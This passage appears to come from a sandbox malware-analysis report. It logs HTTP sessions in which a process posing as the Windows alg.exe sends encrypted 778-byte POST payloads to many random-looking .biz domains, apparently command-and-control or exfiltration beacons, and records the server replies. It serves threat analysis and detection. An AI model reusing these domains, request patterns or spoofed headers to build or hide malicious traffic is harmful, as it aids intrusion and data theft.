                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.077694893 CET778OUTData Raw: f5 30 19 7d 24 27 e8 37 fe 02 00 00 e8 88 7d b8 16 7a fa 1a 02 c7 25 ad 57 29 da 57 fd 02 79 4c b4 ec 6d 6a d0 91 7c 4d f4 ad 0b 97 55 b5 9d aa 2e 04 49 39 5d 82 33 b0 c0 60 a0 f5 0f 40 14 3e df 89 15 81 29 2e 28 e4 c8 94 de e7 ba 72 b4 e9 30 1a
                                                                                                                                                                                                                                    Data Ascii: 0}$'7}z%W)WyLmj|MU.I9]3`@>).(r0)8rC' i,p5f&4G[`wGDpHd;h.u~|V]~(\C`TZiWv/3J@EP!n_XJS[!\3~y!8A%
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.193420887 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    29192.168.2.44985913.251.16.150807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457752943 CET345OUTPOST /rss HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: qaynky.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:13.457767963 CET778OUTData Raw: 85 85 c7 2f a0 bd ca 67 fe 02 00 00 3b ea 95 4f e3 a0 02 9c 4e c0 ce 36 80 44 8f a9 ef 0b fe 4d 7d 00 a3 97 94 ca 0f be dc b8 08 44 7f 99 ab 11 57 4c de a1 ba fc 52 96 bb 38 6e d0 90 8b 6e 7b a5 28 01 d4 88 ff e2 8d b9 74 63 68 82 85 59 82 3b 18
                                                                                                                                                                                                                                    Data Ascii: /g;ON6DM}DWLR8nn{(tchY;~$pnaOl)7bR7' Kwng;$|5c?0a+Y8=~l0,~vHXhZ:Vyh~z!iB3/9OYVi_$@"E3w
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:14.906455994 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:14 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=b91a228ed90582a62f6ad45c83bc9373|8.46.123.189|1735632374|1735632374|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    30192.168.2.44987144.221.84.105807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147855997 CET354OUTPOST /vnlfrtbjm HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: bumxkqgxu.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.147881985 CET778OUTData Raw: 8b 1d c2 b3 6f 00 b0 6b fe 02 00 00 97 bd 27 06 0c 77 a7 55 93 d9 45 98 eb 02 f1 20 ab 25 64 3b df 5d 06 4d 14 65 cd c1 b3 19 21 e7 6f b3 95 8d 43 73 a7 b6 a2 9a 65 a7 9c 28 fd 71 3f e8 b1 e3 7b a6 84 a4 d4 1a 7b 29 29 4d d6 d2 39 eb 54 39 1f 9c
                                                                                                                                                                                                                                    Data Ascii: ok'wUE %d;]Me!oCse(q?{{))M9T9J.v{HGOXlO=9^h)"Ia2h_?PXuluI;~A*4?f-4Wv[}mAAN3WhS"$IhzGiOwZ:W%Ig\}nC`sJBK
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.611007929 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:15 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=69b1b01d1135f6af57f39e3d21f29c24|8.46.123.189|1735632375|1735632375|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    31192.168.2.44987654.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.879801989 CET356OUTPOST /lcaecfwoxcmb HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: dwrqljrr.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:15.879898071 CET778OUTData Raw: fe 58 88 70 c0 67 98 c7 fe 02 00 00 e1 68 c7 b2 a9 e7 8b 23 53 8d 52 35 cc 85 a2 4c 7e e3 df 25 09 16 22 d1 80 cd fb 40 af f6 6a d5 d1 74 4b 26 3e 81 16 f1 49 e9 5d 7d b0 16 27 f5 04 ac 3e 76 24 6e be bb 00 6e 0a 46 7d e4 e4 ec d4 30 7b fc 34 c0
                                                                                                                                                                                                                                    Data Ascii: Xpgh#SR5L~%"@jtK&>I]}'>v$nnF}0{4}?e"TF@oT_`PhK*[_OT,?h&rB4JM;W5d39Z@O b( G6>vZn*5.n#RN_3r6h'g"ST
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.579987049 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=64382f523b8c4a15ca8f1e6dcfdb284e|8.46.123.189|1735632376|1735632376|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    32192.168.2.44988335.164.78.200807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.779573917 CET351OUTPOST /okuqeyemp HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: nqwjmb.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:16.779587030 CET778OUTData Raw: d8 07 51 e1 1d 13 e1 52 fe 02 00 00 dd db 63 08 d0 e6 2e 94 69 6e 45 34 09 e6 04 e2 36 ba 18 f0 64 01 85 fe 36 c6 9d 5f ca be 6c 19 67 d0 12 b9 bc 64 19 79 3d e3 bf c5 bb 5c d1 93 3e 5e 7e ae 78 07 1f cb 7a fa c4 1d 37 27 97 6b 80 5b 31 4e c4 a0
                                                                                                                                                                                                                                    Data Ascii: QRc.inE46d6_lgdy=\>^~xz7'k[1N$"w:b.$A1+|0WoHxxXy>|3vE^0X|`bBQJwxX":S-g";-8Ry?!$qdr6O0
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.510077953 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:17 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=23e283f4e084634ecf5fe29f765f49cd|8.46.123.189|1735632377|1735632377|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    33192.168.2.4498913.94.10.34807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916960955 CET348OUTPOST /lwt HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: ytctnunms.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:17.916976929 CET778OUTData Raw: 7d a4 57 bc 45 f1 c6 ac fe 02 00 00 e7 82 0b 88 7c c4 8a 1c fb b4 51 63 c4 60 e0 87 38 e7 e4 a1 b2 a3 d0 1c cd c4 56 51 46 42 c2 a8 fc 7d 3d 0e 79 24 94 31 88 fa 6b d2 52 b3 a8 f4 60 47 17 6c f7 43 d1 dc d1 17 51 53 5a 2d f4 af ea 43 2a f0 d4 c8
                                                                                                                                                                                                                                    Data Ascii: }WE|Qc`8VQFB}=y$1kR`GlCQSZ-C*:b-VnCou\*g5]1d(]}/#+i$p^+:UCq@2eYee@[R*zGkw__slG0lJ{A_*#kO
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.390219927 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=e749ab8a7b6ce78f758cd10eb83f3a31|8.46.123.189|1735632378|1735632378|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    34192.168.2.449895165.160.13.20807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630624056 CET357OUTPOST /ydgyvfihkfuxmwlx HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:18.630673885 CET778OUTData Raw: f2 f7 1f ae dd ec 5b ef fe 02 00 00 c2 5b f3 9e e0 a1 ea e4 72 a5 d3 a1 f3 e5 8f 6d e8 ef 6a 40 7f 74 58 96 1a ba 26 01 8c 23 3a c6 07 94 05 07 61 94 21 78 e8 f2 88 01 ed 20 39 ea d5 ee 6b 7a cf f6 3e dc 7c a9 0f f6 0a de 12 dc af 5d 4f c3 48 51
                                                                                                                                                                                                                                    Data Ascii: [[rmj@tX&#:a!x 9kz>|]OHQ$E'JQ{yet9mZ'tRU`}bbY)lMRSvt;T)$4.)R7k>ClI+xF|,]yxCO5/f0C
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.381952047 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:19 GMT
                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.425441980 CET342OUTPOST /l HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.425476074 CET778OUTData Raw: 50 8d d2 80 b2 5b d1 8d fe 02 00 00 63 e2 c4 c5 ff bd 33 0d f1 39 8d 4e 2c cd 05 70 32 a7 c3 7c 05 c2 02 d4 77 5b e1 b6 3d 10 1d 63 b0 f8 84 60 3c d4 4b 6e c1 f9 2e 6a 1a f8 75 c5 30 1d d9 0e b9 a0 2a eb bb e1 a4 41 8a b1 c8 9e 54 a6 64 d5 ca 89
                                                                                                                                                                                                                                    Data Ascii: P[c39N,p2|w[=c`<Kn.ju0*ATdS9$!4wF`P#Uagy[U|d;^tqe)x8=5RYpB["C9f7(BdmpLHs5Y/qmX1 /ZA}? x
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:19.607393026 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:19 GMT
                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    35192.168.2.44991054.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843485117 CET354OUTPOST /vcdhvtdni HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: oshhkdluh.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:20.843498945 CET778OUTData Raw: d3 a3 26 79 db d0 15 8c fe 02 00 00 75 cc 60 33 2f 00 2c 0f d4 6b bd 52 cf 58 01 1b bb b2 9d 97 fe 5c 29 52 db f8 bb ff 8c d6 7d 38 e2 70 65 9b 5c 06 ff 8a 68 4d b4 ad 64 b8 cb b0 d0 ea 54 21 82 94 b9 23 d0 0b cd 87 73 80 7c 34 c9 99 c7 d7 4f 50
                                                                                                                                                                                                                                    Data Ascii: &yu`3/,kRX\)R}8pe\hMdT!#s|4OP$d~hGe}3h.WPu@9f42Hph,p`g/Qk!{hl<d9;d(PJ=+#R,X2)^Tjs}9Up*^;Dbw9RYr
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.574311972 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:21 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=c81ba6408f4898da30c42cd2ab59f723|8.46.123.189|1735632381|1735632381|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    36192.168.2.449916208.117.43.225807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965406895 CET354OUTPOST /pjpssoyxmlc HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:21.965450048 CET778OUTData Raw: 79 40 2c 54 03 ae f9 e6 fe 02 00 00 39 6a c4 2d 2b c1 fc 0a 8f 44 34 1a 78 bd a3 67 48 92 6a 87 2e f0 4b fe 45 8f 00 24 68 d0 a6 dc f1 4b 1e 4e 68 9a d2 13 46 64 7d d1 bd ae 9c bd 7c ad 4a 2e 0f 39 63 d2 2d b7 f3 ee 18 d6 c6 a4 74 bc bd c3 e3 7c
                                                                                                                                                                                                                                    Data Ascii: y@,T9j-+D4xgHj.KE$hKNhFd}|J.9c-t|MGsFL8U~Ykx`DXWEfjIv2fSg|S'H*3maW6ars]Pkxs)=LUT-ZggVy(yoXm`/
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.477936029 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:22 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.525209904 CET347OUTPOST /pcyu HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.525211096 CET778OUTData Raw: 73 92 e2 dd 5b ff 68 23 fe 02 00 00 e8 80 06 55 60 d6 84 15 e8 ff 5e 6d 2d b8 87 cd 8c 8b a5 8e f4 e1 b6 0d cc 9f 9c 9f 63 7d 0c 22 b3 31 7b 9a 15 27 14 64 07 77 a1 14 3a 3c a9 40 58 3e f5 ae 76 f4 77 e1 a7 a2 62 46 01 5c e4 bf 40 0e c5 9e 0a 45
                                                                                                                                                                                                                                    Data Ascii: s[h#U`^m-c}"1{'dw:<@X>vwbF\@E)0nJf_lD*4!_1b^GXoR 2@e,,R>70k9H/>Xw<uI*8m&&?t,J#.HVUe!l5HVzXS
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:22.644244909 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:22 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                    Connection: keep-alive
